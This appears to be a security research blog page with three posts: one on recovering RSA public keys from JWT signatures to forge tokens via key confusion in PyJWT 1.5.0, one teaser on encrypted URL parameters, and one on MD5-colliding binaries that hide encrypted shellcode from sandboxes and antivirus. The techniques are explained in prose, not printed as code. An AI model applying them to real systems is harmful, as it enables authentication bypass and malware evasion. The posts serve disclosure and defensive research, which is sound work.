Abusing JWT public keys without the public key

Author: b

This blog post is dedicated to those to brave souls that dare to roll their own crypto 

The RSA Textbook of Horrors

This story begins with an old project of ours, where we were tasked to verify (among other things) how a business application handles digital signatures of transactions, to comply with four-eyes principles and other security rules.

The application used RSA signatures, and after a bit of head scratching about why our breakpoints on the usual OpenSSL API’s don’t trigger, but those placed at the depths of the library do, we realized that developers implemented what people in security like to call “Textbook RSA” in its truest sense. This of course led to red markings in the report and massive delays in development, but also presented us with some unusual problems to solve.

One of these problems stemmed from the fact that although we could present multiple theoretical attacks on the scheme, the public keys used in this application weren’t published anywhere, and without that we had no starting point for a practical attack.

At this point it’s important to remember that although public key cryptosystems guarantee that the private key can’t be derived from the public key, signatures, ciphertexts, etc., there are usually no such guarantees for the public key! In fact, the good people at the Cryptography Stack Exchange presented a really simple solution: just find the greatest common divisor (GCD) of the difference of all available message-signature pairs. Without going into the details of why this works (a more complete explanation is here), there are a few things that worth noting:

  • An RSA public key is an (n,e) pair of integers, where n is the modulus and e is the public exponent. Since e is usually some hardcoded small number, we are only interested in finding n.
  • Although RSA involves large numbers, really efficient algorithms exist to find the GCD of numbers since the ancient times (we don’t have to do brute-force factoring).
  • Although the presented method is probabilistic, in practice we can usually just try all possible answers. Additionally, our chances grow with the number of known message-signature pairs.

In our case, we could always recover public keys with just two signatures. At this time we had a quick and dirty implementation based on the gmpy2 library that allowed us to work with large integers and modern, efficient algorithms from Python.

JOSE’s curse

It took a couple of weeks of management meetings and some sleep deprivation to strike me: the dirty little code we wrote for that custom RSA application can be useful against a more widespread technology: JSON Web Signatures, and JSON Web Tokens in particular.

Design problems of the above standards are well-known in security circles (unfortunately these concerns can’t seem to find their ways to users), and alg=”none” fiascos regularly deliver facepalms. Now we are targeting a trickier weakness of user-defined authentication schemes: confusing symmetric and asymmetric keys.

If you are a developer considering/using JWT (or anything JOSE), please take the time to at least read this post! Here are some alternatives too.

In theory, when a JWT is signed using an RSA private key, an attacker may change the signature algorithm to HMAC-SHA256. During verification the JWT implementation sees this algorithm, but uses the configured RSA public key for verification. The problem is the symmetric verification process assumes that the same public key was used to generate the MAC, so if the attacker has the RSA public key, she can forge the signature too.

In practice however, the public key is rarely available (at least in a black-box setting). But as we saw earlier, we may be able to solve this problem with some algebra. The question is: are there any practical factors that would prevent such an exploit?

 CVE-2017-11424

To demonstrate the viability of this method we targeted a vulnerability of PyJWT version 1.5.0 that allowed key confusion attacks as described in the previous section. The library uses a blacklist to avoid key parameters that “look like” asymmetric keys in symmetric methods, but in the affected version it missed the “BEGIN RSA PUBLIC KEY” header, allowing PEM encoded public keys in the PKCS #1 format to be abused. (I haven’t checked how robust key filtering is, deprecating the verification API without algorithm specification is certainly the way to go)

Based on the documentation, RSA keys are provided to the encode/decode API’s (that also do signing and verification) as PEM encoded byte arrays. For our exploit to work, we need to create a perfect copy of this array, based on message and signature pairs. Let’s start with the factors that influence the signature value:

  • Byte ordering: The byte ordering of JKS’s integer representations matches gmpy2‘s.
  • Message canonization: According to the JWT standard, RSA signatures are calculated on the SHA-256 hash of the Base64URL encoded parts of tokens, no canonization of delimiters, whitespaces or special characters is necessary.
  • Message padding: JKS prescribes deterministic PKCS #1 v1.5 padding. Using the appropriate low level crypto API’s (this took me a while, until I found this CTF writeup) will provide us with standards compliant output, without having to mess with ASN.1.

No problem here: with some modifications of our original code, we could successfully recreate the Base64URL encoded signature representations of JWT tokens. Let’s take a look at the container format (this guide is a great help):

  • Field ordering: Theoretically we could provide e and n in arbitrary order. Fortunately PKCS #1 defines a strict ordering of parameters in the ASN.1 structure.
  • Serialization: DER (and thus PEM) encoding of ASN.1 structures is deterministic.
  • Additional data: PKCS #1 doesn’t define additional (optional) data members for public keys.
  • Layout: While it is technically possible to parse PEM data without standard line breaks, files are usually generated with lines wrapped at 64 characters.

As we can see, PKCS #1 and PEM allows little room for changes, so there is a high chance that if we generate a standards compliant PEM file it will match the one at the target. In case of other input formats, such as JWK, flexibility can result in a high number of possible encodings of the same key that can block exploitation.

After a lot of cursing because of the bugs and insufficient documentation of pyasn1 and asn1 packages, asn1tools finally proved to be usable to create custom DER (and thus PEM) structures. The generated output matched perfectly with the original public key, so I could successfully demonstrate token forgery without preliminary information about the asymmetric keys:

We tested with the 2048-bit keys from the JKS standard: it took less than a minute on a laptop to run the GCD algorithm on two signatures, and the algorithm produced two candidate keys for PKCS #1 which could be easily tested.

As usual, all code is available on GitHub. If you need help to integrate this technique to your Super Duper JWT Haxor Tool, use the Issue tracker!

Applicability

The main lesson is: one should not rely on the secrecy of public keys, as these parameters are not protected by mathematical trapdoors.

This exercise also showed the engineering side of offensive security, where theory and practice can be far apart: although the main math trick here may seem unintuitive, it’s actually pretty easy to understand and implement. What makes exploitation hard, is to figure out all those implementation details that make pen and paper formulas work on actual computers. It won’t be a huge surprise to anyone who worked with digital certificates and keys that at least 2/3 of the work involved here was about reading standards, making ASN.1 work, etc. (Not to mention constantly converting byte arrays and strings in Python3 :P) Interestingly, it seems that the stiffness of these standards makes the format of the desired keys more predictable, and exploitation more reliable!

On the other hand, introducing unpredictable elements in the public key representations can definitely break the process. But no one would base security on their favorite indentation style, would they?


The curious case of encrypted URL parameters

Author: dnet

As intra-app URLs used in web applications are generated and parsed by the same code base, there’s no external force pushing developers towards using a human-readable form of serialization. Sure, it’s easier to do debugging and development, but that’s why I used the word “external”. Many frameworks use custom encodings, but one of the most extreme things a developer can do in this regard is completely encrypting request parameters. We encountered such a setup during a recent web app security assessment, let’s see how it worked out.

(more…)


Poisonous MD5 – Wolves Among the Sheep

Author: b

MD5 is known to be broken for more than a decade now. Practical attacks have been shown since 2006, and public collision generator tools are also available since that time. The dangers of the developed collision attacks were demonstrated by academia and white-hat hackers too, but in case of the Flame malware we’ve also seen malicious parties exploiting the weaknesses in the wild.

And while most have already moved away from MD5, there is still a notable group that heavily uses this obsolete algorithm: security vendors. It seems that MD5 became the de-facto standard of fingerprinting malware samples and the industry doesn’t seem to be willing to move away from this practice. Our friend Zoltán Balázs collected a surprisingly long list of security vendors using MD5, including the biggest names of the field.

The list includes for example Kaspersky, the discoverer of Flame who just recently reminded us that MD5 is dead, but just a few weeks earlier released a report including  MD5 fingerprints only – ironically even the malware they analysed uses SHA-1 internally…

And in case you think that MD5 “good enough” for malware identification let’s take another example. The following picture shows the management console of a FireEye MAS – take a good look at the MD5 hases, the time delays and the status indicators:

fireeye_duplicateDownload sample files

As you can see, binaries submitted for analysis are identified by their MD5 sums and no sandboxed execution is recorded if there is a duplicate (thus the shorter time delay). This means that if I can create two files with the same MD5 sum – one that behaves in a malicious way while the other doesn’t – I can “poison” the database of the product so that it won’t even try to analyze the malicious sample!

After reading the post of Nat McHugh about creating colliding binaries I decided to create a proof-of-concept for this “attack”. Although Nat demonstrated the issue with ELF binaries, the concept is basically the same with Windows (PE) binaries that security products mostly target. The original example works by diverting the program execution flow based on the comparison of two string constants. The collision is achieved by adjusting these constants so that they match in one case, but not in the other.

My goal was to create two binaries with the same MD5 hash; one that executes arbitrary shellcode (wolf) and another that does something completely different (sheep). My implementation is based on the earlier work of Peter Selinger (the PHP script by Nat turned out to be unreliable across platforms…), with some useful additions:

  • A general template for shellcode hiding and execution;
  • RC4 encryption of the shellcode so that the real payload only appears in the memory of the wolf but not on the disk or in the memory of the sheep;
  • Simplified toolchain for Windows, making use of Marc Stevens fastcoll (Peter used a much slower attack, fastcoll reduces collision generation from hours to minutes);

The approach may work with traditional AV software too as many of these also use fingerprinting (not necessarily MD5) to avoid wasting resources on scanning the same files over and over (although the RC4 encryption results in VT 0/57 anyway…). It would be also interesting to see if “threat intelligence” feeds or reputation databases can be poisoned this way.

The code is available on GitHub. Please use it to test the security solutions in your reach and persuade vendors to implement up-to-date algorithms before compiling their next marketing APT report!

For the affected vendors: Stop using MD5 now! Even if you need MD5 as a common denominator, include stronger hashes in your reports, and don’t rely solely on MD5 for fingerprinting!